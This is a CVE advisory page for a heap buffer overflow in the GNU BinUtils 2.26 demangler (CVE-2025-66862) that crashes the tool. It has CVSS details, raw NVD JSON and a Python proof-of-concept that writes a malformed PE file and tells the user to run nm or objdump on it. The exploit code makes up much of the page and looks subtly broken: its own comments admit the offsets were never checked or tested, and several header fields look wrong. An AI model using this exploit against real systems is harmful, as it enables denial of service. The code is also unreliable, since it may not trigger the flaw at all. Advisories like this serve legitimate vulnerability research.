Security Vulnerability Report
CVE-2025-66862 CVSS 7.5 HIGH

CVE-2025-66862

Published: 2025-12-29 17:15:46
Last Modified: 2026-01-14 19:36:46

Description

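A buffer overflow vulnerability in the function gnu_special in the file cplus-dem.c in BinUtils 2.26 allows attackers to cause a denial of service via a crafted PE file. The raw record below classifies the weakness as CWE-122 (heap-based buffer overflow), and the CVSS vector rates only availability as impacted.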

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:* - VULNERABLE
GNU BinUtils 2.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-66862 PoC - BinUtils cplus-dem.c Buffer Overflow

Builds a PE-shaped byte string whose string table holds one very long
mangled-looking symbol name, and writes it to disk so the symbol-listing
tools of a BinUtils build can be run against it.

The advisory on this page lists GNU BinUtils 2.26 as the affected
configuration and classifies the weakness as CWE-122; the stated impact is
a crash (availability only).

NOTE(review): the field names in the comments below are the original
author's labels. The offsets were not checked against the PE/COFF layout
and the file was not run against an affected build, so whether the input
actually reaches gnu_special is unconfirmed -- compare with the crash
report referenced in the CVE record before relying on it as a regression
fixture.
"""
import struct
import sys


def _filled(size, fields):
    """Return a zeroed bytearray of *size* bytes with *fields* packed in.

    Each field is a ``(struct format, offset, value)`` triple; the triples
    are applied in the order given.
    """
    buf = bytearray(size)
    for fmt, offset, value in fields:
        struct.pack_into(fmt, buf, offset, value)
    return buf


def create_malformed_pe_with_overflow():
    """
    Assemble the test file in memory and return it as ``bytes``.

    The result is the concatenation of a 64-byte DOS header, the PE
    signature, a 20-byte COFF header, a 224-byte optional header, one
    40-byte section header, 0x200 zero bytes of padding, an 18-byte symbol
    record and a NUL-terminated string table holding the long name.
    Nothing is written to disk here; see main().
    """
    # DOS header: signature plus the offset of the PE signature.
    dos_header = _filled(64, [("<H", 60, 64)])  # e_lfanew offset
    dos_header[0:2] = b"MZ"  # DOS signature

    pe_sig = b"PE\x00\x00"

    # COFF header (labels as given by the original author; see module note).
    coff_header = _filled(
        20,
        [
            ("<H", 0, 0x014C),  # Machine: i386
            ("<H", 2, 1),  # NumberOfSections
            ("<I", 12, 224),  # SizeOfOptionalHeader
            ("<H", 16, 0x0102),  # Characteristics
        ],
    )

    # Optional header (minimal).
    optional_header = _filled(
        224,
        [
            ("<H", 0, 0x010B),  # Magic: PE32
            ("<I", 16, 0x1000),  # SizeOfCode
            ("<I", 20, 0x1000),  # BaseOfCode
            ("<Q", 24, 0x400000),  # ImageBase
            ("<I", 32, 0x1000),  # SectionAlignment
            ("<I", 36, 0x200),  # FileAlignment
            ("<I", 56, 0x10000),  # SizeOfImage
        ],
    )

    # Section header (.text).
    section_header = _filled(
        40,
        [
            ("<I", 8, 0x1000),  # VirtualSize
            ("<I", 12, 0x1000),  # VirtualAddress
            ("<I", 16, 0x200),  # SizeOfRawData
            ("<I", 20, 0x200),  # PointerToRawData
            ("<I", 36, 0x60000020),  # Characteristics
        ],
    )
    section_header[0:8] = b".text\x00\x00\x00"

    # Overly long mangled-looking name placed in the string table.
    long_name = b"_ZN" + b"A" * 1000 + b"E"

    # Single symbol record.
    symbol_table = _filled(
        18,
        [
            ("<I", 0, 0),  # Name (offset to string)
            ("<I", 4, 0),  # Value
            ("<H", 8, 0),  # SectionNumber
            ("<H", 10, 0),  # Type
            ("<B", 12, 8),  # StorageClass
            ("<B", 13, 0),  # NumberOfAuxSymbols
        ],
    )

    # String table (follows the symbol record).
    string_table = long_name + b"\x00"

    return b"".join(
        (
            dos_header,
            pe_sig,
            coff_header,
            optional_header,
            section_header,
            bytes(0x200),  # Padding to file alignment
            symbol_table,
            string_table,
        )
    )


def main():
    """Write the generated file to the working directory and print usage."""
    print("[*] Generating CVE-2025-66862 PoC PE file...")
    payload = create_malformed_pe_with_overflow()

    output_file = "cve-2025-66862-poc.exe"
    with open(output_file, "wb") as handle:
        handle.write(payload)

    print(f"[+] PoC file created: {output_file}")
    print("[*] To trigger the vulnerability, run:")
    print(f" nm {output_file}")
    print(f" objdump -t {output_file}")
    print("[*] This should cause BinUtils to crash due to buffer overflow")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66862", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:46.100", "lastModified": "2026-01-14T19:36:45.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability in function gnu_special in file cplus-dem.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "7A0BCBA2-7605-4976-8364-E6D1484D0CA9"}]}]}], "references": [{"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash3.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}